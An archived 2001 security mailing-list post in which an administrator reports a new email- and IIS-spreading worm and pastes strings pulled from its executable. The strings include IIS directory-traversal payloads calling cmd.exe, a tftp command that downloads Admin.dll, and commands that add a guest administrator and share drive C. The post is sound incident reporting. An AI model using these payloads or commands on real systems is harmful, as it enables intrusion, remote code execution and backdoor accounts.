New "concept" virus/worm?

From: Joao Gouveia (jgouveiaat_private)
Date: Tue Sep 18 2001 - 08:42:51 PDT

  • Next message: Dan Jones: "Re: New "concept" virus/worm?" 

    ( sorry for the cross-post, this might have interest for both lists )

Hello all,

Today i've received two aparent distinct strange incidents. One sequence of
strange mails with executable attachments and a large number of hits on my
IDS regarding attemtps to exploit known security problems within Microsoft
IIS.
At a first glance, I did not understand that those two incidents were
related, util I did a "strings \*.exe" to figure out what the hell was that.
What I could found out is that this is ( at least for me ), a new
virus/worm/whatever that uses SMTP ( exploiting known vulnerabilities within
Microsoft Outlook ) and many also known vulnerabilities within Microsoft
IIS.
Here are some of it's content:

<quote>
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
Concept Virus(CV) V.5, Copyright(C)2001  R.P.China
....
NUL=
[rename]
\wininit.ini
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\*.*
EXPLORER
fsdhqherwqi2001
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares\Security
share c$=c:\
user guest ""
localgroup Administrators guest /add
localgroup Guests guest /add
user guest /active
open
user guest /add
HideFileExt
ShowSuperHidden
Hidden
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
...
software\microsoft\windows nt\currentversion\perflib
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c..
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
html script language="JavaScript" window.open("readme.eml", null,
"resizable=no,top=6000,left=6000") script html
/Admin.dll
GET %s HTTP/1.0
Host: www
Connnection: close
readme
main
index
default
html
.asp
.htm
\readme.eml
.exe
winzip32.exe
riched20.dll
.nws
.eml
.doc
 .exe
...
SYSTEM\CurrentControlSet\Services\lanmanserver\Shares
Cache
Software\Microsoft\Windows\CurrentVersion\Explorer\MapMail
QUIT
Subject:
From: <
DATA
RCPT TO: <
MAIL FROM: <
HELO
aabbcc
 -dontrunold
NULL
\readme*.exe
admin.dll
qusery9bnow
 -qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
....
</quote>

I kept the executables for analysis, if anyone woud like to take a look,
drop me an email.

So, what I ask is, does anyone know about this worm?
I've done a quick search for it and couldn't find nothing like it.

Best regards,

Joao Gouveia
-------------
jgouveiaat_private





----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

    This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:53:04 PDT